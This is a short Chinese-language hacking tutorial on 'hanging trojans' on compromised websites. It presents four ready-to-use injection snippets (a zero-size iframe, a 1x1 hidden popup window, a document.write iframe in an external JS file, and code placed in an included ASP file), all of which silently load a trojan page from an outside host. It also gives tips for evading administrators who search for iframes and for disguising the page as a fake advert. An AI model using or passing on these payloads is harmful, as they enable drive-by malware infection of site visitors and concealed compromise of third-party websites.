网站挂马

方法一：
一般在你入侵了一个站拿到了webshell的时候，没有拿到就不要谈挂马拉。最常见的 挂站代码如下 ：

<html>
<iframe src= http://www.yuzhiguo.com  width="0" height="0" frameborder="0">
</iframe>
</html>

把以上代码插到对方网页代码中，那么下次别人浏览了那个站点就会自动转向http://www.yuzhiguo.com。而http://www.yuzhiguo.com 也就是我门的网页木马了（可以换成自己的页面），那width="0" height="0"又是什么意思呢？width就是宽而height自然就是高了。我们把它设置为0也就是不显示了，对方也就看不见我们的这个页面，木马也就会被下载到本地。

方法二：

<script language=javascript>       
window.open(" http://www.yuzhiguo.com ","","toolbar=no,location=no,
directories=no,status=no,menubar=no,scrollbars=no,width=1,height=1");   
</script> 

打开网站的同时也就打开了我们的是不是比上面的那个隐蔽了些。如果粗心的管理员在搜索了iframe没结果后，放弃了检查这个页面，那你不是拣了大便宜了！这里我把width和height的值设置为1了，不错！就是1，因为我在用0测试了N次后，发现打开页面弹出我们的木马页是满屏显示的
其实我们还可以简单装饰一下那个页面的，让弹出一个我们伪造的广告，达到欺骗的效果！至于怎么伪装就看你自己发挥了。还有几种方法在这里就不一一列举了，flash木马也很厉害的哦。

方法三：
还有一点就是比较隐蔽的那就是使用js文件
主页只有一个<script language=javascript src=./inc/bbsxp.js></script>
js内容可以为documnet.write("" "" 中可为任何html代码..)

document.write("<iframe height=0 width=0 src=' http://www.yuzhiguo.com ' name=hiddenframe></iframe>")

此招相当隐蔽.......实战就不用说了..............

方法四：
代码加进包含文件<!--#include file="conn.asp"-->